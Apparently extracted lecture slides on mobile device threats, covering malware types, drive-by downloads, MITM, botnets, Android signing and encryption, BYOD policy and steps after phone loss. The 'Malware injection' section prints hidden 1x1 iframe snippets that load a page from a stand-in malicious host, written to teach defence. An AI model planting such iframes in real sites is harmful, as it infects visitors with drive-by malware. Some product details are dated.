Mobile Threats and Attacks

advertisement
MOBILE THREATS AND
ATTACKS
Possible attack threats to mobile devices
• Network exploit
• Hackers takes advantage of vulnerability or flaw of user’s web
browser on mobile device in WiFi communication to attack victims.
• Hackers send malicious code/data from malicious logic websites to
victim’s browser after user browses the malicious page and the
malicious code will take over the control to get all sensitive data on
the victim’s device.
• Social engineering
• Hackers use hyped contents to attract, manipulate, or persuade
people into revealing confidential information through deception
such as phishing for the purpose of information gathering, fraud, or
access rights.
Possible attack threats to mobile devices
• Malware
• Virus hosted on a legitimate code, replicable spread worms, Trojan
horses with action in purpose
• Misuse available resource and service
• Email/SMS spam or denial of service (A group of the attacking
devices send volume data to one targets on the Internet to impact
the target’s services)
Possible attack threats to mobile devices
• Enterprise/private Data Loss
• Work place data on a mobile device may be uploaded to home PC
while synchronizing of entertainment downloading or
Enterprise/private data loss due to stolen device
• Data tamper
• Intentionally modify/corrupt device data without the permission
such as device’s contact list
Best practices protecting mobile device from potential
threats
• Protect data loss due to mobile device loss with device ID
•
•
•
•
and remotely remove all the apps, contacts, and
confidential data right after the mobile phone is stolen or
lost
Type URL instead of copying/pasting or clicking links to
protect mobile phones from drive-by download attacks
Protect data privacy by data Encryption, don’t cache
sensitive data
Disable unnecessary device features such as Wi-Fi,
Bluetooth, and infrared when they aren’t in use.
Enabling the firewall, disable sharing
Best practices protecting mobile device from potential
threats
• Isolate personal apps and corporate apps
• Detect and Remove malware Apps
• Download all mobile apps from trusted sources
application providers and check the permission requests
during installation
• Install a mobile security application to protect the mobile
device from attacks
Mobile device security protection Strategies
•
•
•
•
•
Block the app’s attempt to act beyond granted
permissions
Access Control with ID and resource access
permission requirement
App signature: Each app is signed with the identity of
its author and protect app from tampering
Encryption: Encrypt data for data protection in case of
device loss or theft
Isolation: Restrict any app to access the sensitive data
on a device. Each Android app runs in its own virtual
machine (process) which does not allow any access to
resource belong to other VM except special permission
grant.
Android’s Security
• Android’s Security is supported by encryption, signature, Isolation,
and access control security protection Strategies. However there still
are vulnerabilities for Android mobile devices.
• The Android app signature system is to ensure that the app’s logic is
not tampered with, enforce a user to recognize the identity of the
app’s author. Although Android will only install and run a signed app, a
certificate is not required by Google. Hackers can still use anonymous
digital certificates to sign their malware and distribute them without
any certification by Google which is required by Apple.
• A hacker can create and distribute malicious app since people will
not be able to track down to the source and attackers add Trojan
horses and malicious code to a existing legitimate app and then resign the updated version with an anonymous or fake certificate and
distribute it. Its original digital signature is tempered and lost.
Bring Your Own Device (BYOD) with Mobile Device
Management (MDM)
Enterprise BYOD policy:
• Use MDM tools to oversee and control mobile devices in
•
•
•
•
•
•
•
•
•
secure operations
Store enterprise data in sandbox
Encrypte enterprise data on mobile devices
Keep apps current with less vulnerabilities and flaws
Routinely back up all apps and upgrade OS
Authenticate and register all mobile devices with Secure
Socket Layer (SSL) certificate
Adopt app blacklisting within enterprise
Management on the lost and stolen devices
Separate personal and business accounts
Controls user access
Mobile Malware Security Solutions
• Popular Mobile Malware(malicious software) are:
• Spyware – steals user information with user’s consent somehow.
• Trojan horse – steals confidential information such as credit card
• Adware - displays unwanted pop-up ads with/without theft of
sensitive data
• There are some malware that just degrade or disrupt device
operations such as rebooting device and exhausting device power
without financial profit purpose.
• Due to small screen size of mobile device most apps don’t show the
URL address on the device screen while accessing web which takes
even more difficult for mobile device user monitor and determine the
destination of app on web.
Common types of malware delivery mechanisms
• Drive-by malware(silent Malware)
• Drive-by malware delivers(downloads) itself onto a
user’s devices without their consent and interaction by
exploiting vulnerabilities of user browser via an invisible
element such as HTML iframe tag element or by HTML
embed element of image file. Such malware either
tempts the victim to visit a infected website or send
malware-infected messages (SMS).
• Software updates
• Malware invites users to update software ( turned out to
be a malicious one) on social network or web sits.
Common types of malware delivery mechanisms
• Pop-up ads
Adware lures users to click on an ad that directs user to
download/install malicious code such as Trojan horse in a word or pdf
file. The downloaded may also be The keylogger which monitors
mouse operations or keyboard strokes to steal personal data.
• Man-in-the-middle(MITM)
Hacker may hijack a session by eavesdropping where the hacker
makes independent connections with the victims and relays
messages between two parties such that both parties thought they
are talking directly to each other over. The MITM hacker intercepts all
conversation and inject
• Botnet
One attacker controls a group of sites(devices) to send a large
volume of traffic to a victim resulted in a denial of service (DoS)
attack. Afterwards, the hacker Demands the victim a payment to stop
the attack.
Malware detection and protection solution
• Filtering with blacklisting and whitelisting
• Many search engines place malicious website a blocked list
“blacklist.” The search engine will warn to potential visitor who intends
access such sites on the list. A enterprise or a personal can also
setup their own blacklist. A whitelist filter only only access to these on
the list if a whitelist is exclusive. The filter techniques are widely used
for spam email filtering.
• View page source code
Use Page Source (Firefox) or Source (IE) to view the actual source
code to find out the injected malicious code
Spyware detection techniques
a. Static analysis
Static analysis is a reverse engineering analysis
approach to finding malicious characteristics code
segments in an app without execution. The analysis
focus on these obvious security threats which have
been reported before. One lab in this module is given
on the static analysis approach to detect spyware.
b. Dynamic analysis
Dynamic analysis will execute the suspicious mobile app in an
isolated sandbox, such as a virtual machine or emulator to monitor
and inspect the app’s dynamic behavior.
c. c. App Permission analysis
Android security uses permission to protect and detect by
permissions in an Android mobile app’s intentions. The permissions
are required to be clearly specified by app’s authors. Many spyware
attacks make use of app’s vulnerability on the permission.
b.
Malware injection
• Malware injection is the act of inserting malicious code into a
vulnerable web server page with poor application input filtering such
that their devices get infected with malware when users interact with
such page via form or other GUI components. This injection can be
detected by a filter deployed on web server to filter out invalid
commands such as SQL injection commands. Malware injection
works as:
Malware injection
1. Inject a vulnerable website with malicious code that web
browsers may request
HTML:
<iframe src=”http://www.malwebsite/malpage.html”
width=”1″ height=”1″ style=”visibility: hidden”>
</iframe>
JavaScript(iframe is generated dynamically):
<div style-“visibility:hidden: position:absolute: 1; top: 1”>
<iframe src=”http://www.malwebsite.com/malpage.html”
width=”1″ height=”1″ style=”visibility: hidden”>
</iframe>
</div>
2. Exploit and take over control the infected web browsers with
this injected code, direct the exploited web browser to download
malware to users' devices
Once user browses the injected web page, the malicious content
from Hop Point (a website controlled by the hacker) to execute inside
the requested (and presumed legitimate) web page. The malware
injection process instructed in
“http://www.malwebsite.com/malpage.html” is loaded from here
through the iframe to the browser itself which will install specific
piece set of instructions for the browser to connect to a malicious site
in order to download malware such as remote control utilities and
backdoors as well as programs that automatically crawl the hard disk
in search of information such as credit card details or bank accounts
3. Finally, the victim will Silently run this downloaded malware on
user device
Safeguards
• Log on as a no-admin user
• Secure your browser
Set browser security to high to reject unwanted javascripts.
Use Firefox with "no-script" to only run scripts from sites on
whitelist
• examine the application code and web server for
evidence of:
Injected Iframes, javascript, SQL Injection, objects such as flash,
PDF
Mobile device loss/Theft
• Now, smart mobile device is not only for just calling or
sending a message, it has become business and playing
tool for us.
• We’ve stored amount of personal data and even more
sensitive important company data in the mobile device.
These data may be exposed: Email exchanges could be
seen; m-commence data such as online purchasing or
banking transaction might be viewed; If the phone is
connected via a VPN, company networks will be exposed
to malware or could be hacked.
• Americans lost about $30 billion worth of mobile phones
last year. Phones may be lost anywhere and anytime.
• Nearly all who found the lost phones tried to access the
information on the phone,
Mobile device loss/Theft
• The loss of mobile device becomes a concern. About 2/3
of mobile device users feared not being able to recover
lost content.
• It is one of major focus of security concerns for Android
mobile device. Some security experts have pointed out
that targeting smartphones could potentially be more
profitable for criminals than aiming at computers
Action on Your Stolen Mobile Phone
• Avoid data loss
Quick restoration of all important data with a preinstalled autobackup app (e.g., WaveSecure, MyBackup)
Install a mobile tracking app to protect our mobile device
(Android Lost, Where’s My Droid)
• Salvage Actions
Report the loss/theft to your organization and/or mobile service
provider immediately to deter malicious use of your device and
minimize fraudulent charges.
Change account credentials. If devices are used to access remote
resources such as corporate networks or social networking sites, you
should contact your enterprise or organization to revoke all
credentials that were stored on the lost device, all issued certificates
or change your password.
revoke. Locking Smartphone is the first line of defense line for
protection of preventing thieves from stealing broadband service such
as SMS fees, reading your email, or abusing VPN connections.
locates, locks and wipes.
• Locates: Locate your lost device and display the location on a
Google map. Register your Android device with one of the many
available "find me" services to locate and recover lost devices
• Locks:
Remotely locks down your lost device, that nobody can use your
phone without your access, even somebody else exchanges the SIM
card on your phone.
Use lock apps such as Norton Mobile or AppProtector or PIN/
passwords to lock your android devices. You can also enroll in a
remote find/lock service. Enterprises can ensuring company devices
using either Exchange ActiveSync or the Android 2.2 Device Admin to
remotely enforce password policies and routinely lock these devices
and reset passwords.
• Wipes:
Remotely wipe out important data which stored on your device.
Some mobile service providers offer remote default and selective
wiping, which allows you or your provider to remotely delete all data
on the phone.
Android’s Security
• Android’s Security is supported by encryption, signature, Isolation,
and access control security protection Strategies. However there still
are vulnerabilities for Android mobile devices.
• The Android app signature system is to ensure that the app’s logic is
not tampered with, enforce a user to recognize the identity of the
app’s author. Although Android will only install and run a signed app, a
certificate is not required by Google. Hackers can still use anonymous
digital certificates to sign their malware and distribute them without
any certification by Google which is required by Apple.
• A hacker can create and distribute malicious app since people will
not be able to track down to the source and add Trojan horses and
malicious code to a existing legitimate app and then re-sign the
updated version with an anonymous or fake certificate and distribute
it. Its original digital signature is tempered and lost.
Mobile Device-Encryption
• Android 2.2 does not support the encryption. There is no
app can do full device encryption without Android OS
support .
• Google has designed Android 3.0 for mobile device and
they have taken some steps for users and the enterprise.
Android 3.0 comes loaded with full encryption support for
data stored on the device.
• We can still use some file encryption tools to protect our
selected file and data.
References
A window into Mobile device security
http://www.symantec.com/content/en/us/about/media/pdfs
/symc_mobile_device_security_june2011.pdf
 http://www.continuitycentral.com/feature0919.html
 http://www.usatoday.com/tech/news/story/2012-0322/lost-phones/53707448/1]
 US-CERT Resource: Paul Ruggiero and Jon Foote,
“Cyber Threats to Mobile Phones”, http://www.uscert.gov/reading_room/cyber_threats_to_mobile_phones.
pdf)
Top 10 android Security
Riskshttp://www.esecurityplanet.com/views/article.php/39
28646/Top-10-Android-Security-Risks.htm
Download